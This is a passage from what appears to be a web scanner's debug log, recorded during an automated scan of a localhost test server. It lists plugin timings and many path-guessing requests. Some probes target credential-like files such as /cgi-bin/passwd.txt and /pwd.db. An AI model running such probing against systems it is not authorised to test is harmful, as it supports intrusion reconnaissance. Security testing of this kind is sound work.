(c4706ed5377c78d0, 0.06 sec) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/scratch returned HTTP code "404" (id=23996,from_cache=0,grep=1,rtt=0.05,did=pPsuJZS3) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2290. [Wed Feb 12 10:04:32 2020 - debug] clamav.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2291. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/Statistics/ returned HTTP code "404" (id=23998,from_cache=0,grep=1,rtt=0.16,did=cecMKbbf) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/logfile returned HTTP code "404" (id=23999,from_cache=0,grep=1,rtt=0.06,did=FgoWcl97) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/search.cgi returned HTTP code "404" (id=23997,from_cache=0,grep=1,rtt=0.04,did=dsZrTLTi) [Wed Feb 12 10:04:32 2020 - debug] vulners_db.grep(uri="http://localhost:9090/main/") took 0.27s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2292. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:32 2020 - debug] url_session.grep(uri="http://localhost:9090/main/") took 0.02s to run [Wed Feb 12 10:04:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] objects.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_500.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] lang.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2293. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/word/ returned HTTP code "404" (id=24001,from_cache=0,grep=1,rtt=0.19,did=4FXlSUgF) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/@PHPMYADMINChangeLog returned HTTP code "404" (id=24004,from_cache=0,grep=1,rtt=0.13,did=YylVEFyI) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/prod/ returned HTTP code "404" (id=24006,from_cache=0,grep=1,rtt=0.06,did=POnWQ12z) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/odbc/ returned HTTP code "404" (id=24005,from_cache=0,grep=1,rtt=0.11,did=HyyNKMv3) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12438, 'reject-seen-url': 5773, 'reject-out-of-scope': 216, 'accept': 4948} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/password returned HTTP code "404" (id=24003,from_cache=0,grep=1,rtt=0.19,did=5XS2gd80) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/man.sh returned HTTP code "404" (id=24010,from_cache=0,grep=1,rtt=0.13,did=OjNPY8cP) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/homepage/ returned HTTP code "404" (id=24011,from_cache=0,grep=1,rtt=0.26,did=WHTi7wEF) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/webbbs.cgi returned HTTP code "404" (id=24012,from_cache=0,grep=1,rtt=0.15,did=HXRglECv) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/tidfinder.cgi returned HTTP code "404" (id=24013,from_cache=0,grep=1,rtt=0.18,did=1zmzlljf) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/spwd returned HTTP code "404" (id=24000,from_cache=0,grep=1,rtt=0.03,did=OWFrcIRz) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/ax.cgi returned HTTP code "404" (id=24009,from_cache=0,grep=1,rtt=0.15,did=MOLjdshz) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/msql/ returned HTTP code "404" (id=24014,from_cache=0,grep=1,rtt=0.10,did=q23fLJ40) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/wwwthreads/3tvars.pm returned HTTP code "404" (id=24015,from_cache=0,grep=1,rtt=0.06,did=sbH7qPu2) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/login.pl returned HTTP code "404" (id=24016,from_cache=0,grep=1,rtt=0.10,did=auohaJnt) [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/purchases/ returned HTTP code "404" (id=24007,from_cache=0,grep=1,rtt=0.16,did=MoJRNZ3P) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/job/ returned HTTP code "404" (id=24008,from_cache=0,grep=1,rtt=0.11,did=cgB2xUdm) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/statsconfig returned HTTP code "404" (id=24017,from_cache=0,grep=1,rtt=0.16,did=NnArd2Q4) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/files/ returned HTTP code "404" (id=24002,from_cache=0,grep=1,rtt=0.18,did=T0SEcght) [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/main/") took 0.03s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/main/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2294. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2295. [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/main/") took 0.07s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/img/ returned HTTP code "404" (id=24022,from_cache=0,grep=1,rtt=0.03,did=aXDlYo9U) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/ftpsh returned HTTP code "404" (id=24020,from_cache=0,grep=1,rtt=0.19,did=aMxRVzMv) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/updates/ returned HTTP code "404" (id=24018,from_cache=0,grep=1,rtt=0.12,did=0zWt8ilB) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/ingresa/ returned HTTP code "404" (id=24025,from_cache=0,grep=1,rtt=0.06,did=paWCFo0K) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2296. [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:222 / in_use:4 / max:50 / total:226) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (11d43ac50409b2b6, 0.07 sec) (d06b9bdd21a44b84, 0.03 sec) (9141484e6d3a5b86, 0.03 sec) (49178db99004a5df, 0.01 sec) [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2297. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2298. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2299. [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/web/ returned HTTP code "404" (id=24021,from_cache=0,grep=1,rtt=0.11,did=8vpP4pUV) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/testing/ returned HTTP code "404" (id=24024,from_cache=0,grep=1,rtt=0.12,did=fk9YNWGv) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/login/ returned HTTP code "302" (id=24019,from_cache=0,grep=1,rtt=0.17,did=D0ufC8ek) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/wwwstats.html returned HTTP code "404" (id=24023,from_cache=0,grep=1,rtt=0.04,did=HOShS0A9) [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2300. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/dato/ returned HTTP code "404" (id=24026,from_cache=0,grep=1,rtt=0.11,did=fKg52Qcj) [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/orders/orders.log returned HTTP code "404" (id=24027,from_cache=0,grep=1,rtt=0.19,did=rWMrDLMs) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cards/ returned HTTP code "404" (id=24028,from_cache=0,grep=1,rtt=0.01,did=tSQBMuIi) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/code.php3 returned HTTP code "404" (id=24037,from_cache=0,grep=1,rtt=0.10,did=2fn5k94k) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12454, 'reject-seen-url': 5782, 'reject-out-of-scope': 216, 'accept': 4948} [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/directory/ returned HTTP code "404" (id=24032,from_cache=0,grep=1,rtt=0.06,did=GtSZU6Fw) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/sam returned HTTP code "404" (id=24035,from_cache=0,grep=1,rtt=0.05,did=hcWBDX6q) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/services/ returned HTTP code "404" (id=24034,from_cache=0,grep=1,rtt=0.13,did=TlINezPA) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/envia/ returned HTTP code "404" (id=24031,from_cache=0,grep=1,rtt=0.08,did=CMx0GjPx) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cfdocs/exampleapp/email/application.cfm returned HTTP code "404" (id=24033,from_cache=0,grep=1,rtt=0.16,did=IoZwf9J6) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4532. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/stylesheet/ returned HTTP code "404" (id=24029,from_cache=0,grep=1,rtt=0.06,did=2iZlnmaA) [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/admin.php3 returned HTTP code "404" (id=24030,from_cache=0,grep=1,rtt=0.10,did=Qqxk4N1z) [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/passwd.txt returned HTTP code "404" (id=24036,from_cache=0,grep=1,rtt=0.04,did=NONwwOxA) [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/pl/") took 0.06s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2301. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/displayTC.pl returned HTTP code "404" (id=24038,from_cache=0,grep=1,rtt=0.03,did=s7I5DmXg) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/search.pl returned HTTP code "404" (id=24039,from_cache=0,grep=1,rtt=0.08,did=RNhPcnPP) [Wed Feb 12 10:04:33 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:33 2020 - debug] error_pages.grep(uri="http://localhost:9090/pl/") took 0.04s to run [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] feeds.grep(uri="http://localhost:9090/pl/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2302. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/global/ returned HTTP code "404" (id=24040,from_cache=0,grep=1,rtt=0.03,did=trH5e47Z) [Wed Feb 12 10:04:33 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/pl/") took 0.10s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2303. [Wed Feb 12 10:04:33 2020 - debug] symfony.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] expect_ct.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] svn_users.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] private_ip.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] motw.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_generator.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] retirejs.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] file_upload.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:33 2020 - debug] serialized_object.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] blank_body.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] credit_cards.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] websockets_links.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] csp.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] dom_xss.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] vulners_db.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] keys.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/members/ returned HTTP code "404" (id=24042,from_cache=0,grep=1,rtt=0.21,did=nG6JinGj) [Wed Feb 12 10:04:33 2020 - debug] localhost:9090 connection pool stats (free:222 / in_use:6 / max:50 / total:228) [Wed Feb 12 10:04:33 2020 - debug] Connections with more in use time: (0edef3cbdb0f327a, 0.10 sec) (1f7500abed3f2092, 0.07 sec) (49178db99004a5df, 0.05 sec) (1e4d9bc491dffd67, 0.04 sec) (9141484e6d3a5b86, 0.01 sec) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/weblogs/ returned HTTP code "404" (id=24041,from_cache=0,grep=1,rtt=0.11,did=WSt7MOLX) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/system/ returned HTTP code "404" (id=24043,from_cache=0,grep=1,rtt=0.19,did=qGu84ciN) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/statistics/ returned HTTP code "404" (id=24044,from_cache=0,grep=1,rtt=0.15,did=aiM33Vid) [Wed Feb 12 10:04:33 2020 - debug] clamav.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2304. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4531. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/logfile.htm returned HTTP code "404" (id=24045,from_cache=0,grep=1,rtt=0.15,did=BH9lcO7S) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2305. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/restricted/ returned HTTP code "404" (id=24047,from_cache=0,grep=1,rtt=0.05,did=23rrUFMs) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/work/ returned HTTP code "404" (id=24050,from_cache=0,grep=1,rtt=0.09,did=nz4wSdKJ) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/count.cgi returned HTTP code "404" (id=24051,from_cache=0,grep=1,rtt=0.04,did=KHnIPQ1G) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/ingreso/ returned HTTP code "404" (id=24049,from_cache=0,grep=1,rtt=0.03,did=U31hC9EX) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/getdoc.cgi returned HTTP code "404" (id=24048,from_cache=0,grep=1,rtt=0.09,did=NVf1LSYS) [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2306. [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2307. [Wed Feb 12 10:04:33 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] objects.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] error_500.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] meta_tags.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] password_profiling.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] click_jacking.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] lang.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] url_session.grep(uri="http://localhost:9090/news/") took 0.01s to run [Wed Feb 12 10:04:33 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2308. [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/scripts/weblog returned HTTP code "404" (id=24046,from_cache=0,grep=1,rtt=0.10,did=okN72rKX) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/imgs/ returned HTTP code "404" (id=24053,from_cache=0,grep=1,rtt=0.05,did=ZaGMpcv7) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/jrun/ returned HTTP code "404" (id=24055,from_cache=0,grep=1,rtt=0.13,did=nJ3qLEra) [Wed Feb 12 10:04:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12469, 'reject-seen-url': 5792, 'reject-out-of-scope': 216, 'accept': 4948} [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/sql/ returned HTTP code "404" (id=24056,from_cache=0,grep=1,rtt=0.07,did=VQpNOd5u) [Wed Feb 12 10:04:33 2020 - debug] GET http://localhost:9090/password/ returned HTTP code "404" (id=24057,from_cache=0,grep=1,rtt=0.03,did=AfMDvKgq) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/session/adminlogin returned HTTP code "404" (id=24059,from_cache=0,grep=1,rtt=0.18,did=dLDop5mM) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pics/ returned HTTP code "404" (id=24060,from_cache=0,grep=1,rtt=0.06,did=1OqXSOpp) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pron/ returned HTTP code "404" (id=24061,from_cache=0,grep=1,rtt=0.07,did=QVybLiSS) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/axs.cgi returned HTTP code "404" (id=24065,from_cache=0,grep=1,rtt=0.04,did=UkbHyCdL) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/webbbs.exe returned HTTP code "404" (id=24067,from_cache=0,grep=1,rtt=0.10,did=0OS05Wvn) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/pwd.db returned HTTP code "404" (id=24068,from_cache=0,grep=1,rtt=0.08,did=yzvyvX4g) [Wed Feb 12 10:04:33 2020 - debug] HEAD http://localhost:9090/cgi-bin/tigvote.cgi returned HTTP code "404" (id=24071,from_cache=0,grep=1,rtt=0.06,did=8lp2eEmN) [Wed Feb 12 10:04:33 2020 - debug] strange_reason.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] cache_control.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] strange_headers.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] ssn.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 10:04:33 2020 - debug] oracle.grep(uri="http://localhost:9090/news/") took 0.00s to run [Wed Feb 12 